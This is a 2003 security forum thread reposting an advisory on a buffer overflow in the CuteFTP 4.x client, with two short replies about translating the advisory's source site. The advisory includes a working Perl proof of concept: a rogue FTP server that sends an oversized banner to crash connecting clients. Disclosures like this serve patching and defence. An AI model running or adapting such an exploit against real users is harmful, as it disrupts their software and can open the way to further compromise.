• RSS
  • Twitter
  • FaceBook

Security Forums

Log in

FAQ | Search | Usergroups | Profile | Register | RSS | Posting Guidelines | Recent Posts

Cute FTP buffer overflow exploit

Users browsing this topic:0 Security Fans, 0 Stealth Security Fans
Registered Security Fans: None
Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Exploits // System Weaknesses

View previous topic :: View next topic  
Author Message
ShaolinTiger
Forum Fanatic
Forum Fanatic


Joined: 18 Apr 2002
Posts: 16777215
Location: Kuala Lumpur, Malaysia

Offline

PostPosted: Sun Jan 05, 2003 8:42 pm    Post subject: Cute FTP buffer overflow exploit Reply with quote

Damage Hacking Group security advisory www.dhgroup.org

Product: CuteFTP client
Authors: GlobalSCAPE Inc. [www.globalscape.com]
Vulnerable versions: v.4.*
Vulnerability: buffer overflow


Overview

"CuteFTP is a Windows based File Transfer Protocol (FTP) client that
allows users to utilize the capabilities of FTP without having to
know all the details of the protocol itself. CuteFTP simplifies FTP
by offering a user-friendly Windows interface instead of a cumbersome
command line utility. CuteFTP gives novice PC users the ability to
upload, download and edit files on remote FTP servers around the world."

Problem

It's possible to crash CuteFTP (and run shellcode(?)) by sending
long (>2048b) ftp-banner to it. As u understand, this problem could
be used by FTP server.

Fix
Download new verion from www.globalscape.com.

Exploit

#!/usr/bin/perl

#Here is an example of ftp-server. It will freeze each
#CuteFTP-user, that try to connect to it.

use IO::Socket;
$port = "21";
$data = "a";
$num = "2049";
$buf .= $data x $num;
$server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse => 1, Listen => 2)
or die "Couldn't create tcp-server.\n";
while ($client = $server->accept()) {
print "Client connected.\n";
print "Attacking...";
print $client "$buf";
print "OK\n";
close($client);
}
#EOF

Best regards www.dhgroup.org
D4rkGr3y icq 540981
Back to top
View user's profile Send private message Visit poster's website
flw
Forum Fanatic
Forum Fanatic


Joined: 27 May 2002
Posts: 16777215
Location: U.S.A.

Offline

PostPosted: Sun Jan 05, 2003 10:31 pm    Post subject: Reply with quote

Quote:
Damage Hacking Group security advisory www.dhgroup.org


For the few of us that are a bit rusty in our Russian/Slovak skills Very Happy is there a English version or a similar site in english?
Back to top
View user's profile Send private message Visit poster's website
ComSec
Trusted SF Member
Trusted SF Member


Joined: 26 Jul 2002
Posts: 16777215


Offline

PostPosted: Sun Jan 05, 2003 10:56 pm    Post subject: Reply with quote

translate to english from here

http://www.worldlingo.com/products_services/worldlingo_translator.html

just tested it ....works ok
Back to top
View user's profile Send private message Visit poster's website
Display posts from previous:   

Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Exploits // System Weaknesses All times are GMT + 2 Hours
Page 1 of 1


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

Community Area

Log in | Register